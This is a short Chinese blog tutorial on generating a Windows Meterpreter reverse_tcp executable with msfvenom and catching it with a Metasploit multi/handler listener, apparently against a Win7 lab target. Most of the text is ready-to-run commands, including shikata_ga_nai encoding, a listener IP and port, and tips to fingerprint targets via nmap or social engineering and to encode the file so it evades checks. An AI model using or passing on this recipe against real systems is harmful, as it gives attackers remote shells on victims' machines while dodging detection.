版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/boke14122621/article/details/86631906
首先可以查询下msfvenom的使用,可以参考以下博客:
https://www.cnblogs.com/xishaonian/p/6851475.html
我这次使用靶机是win7(sp1) 因此选择生成的payload为exe(可执行文件类型)
Windows
Msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o hellok.exe
用msfvenom生成payload :
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.76.131 lport=4444 x86/shikata_ga_nai
然后在kaili上开启监听:
use exploit/multi/handler
set payload 你选择的payload
set lhost 你的ip
set lport 设定的端口 需要和生成时候一致
run 开始监听
将生成的可执行文件放到靶机上执行,执行成功后返回shell即可
可以继续使用meterpreter命令,具体可以参考博客:https://blog.csdn.net/qq_34841823/article/details/54926500
提高成功率的注意事项:
1. 首先要清楚靶机版本信息,可以使用nmap等工具扫描或者通过社工
2. 其次监听时候设置的参数要和生成payload的参数一致
3. 生成的文件要根据具体的环境能够执行且能够绕过检查,通过编码等方式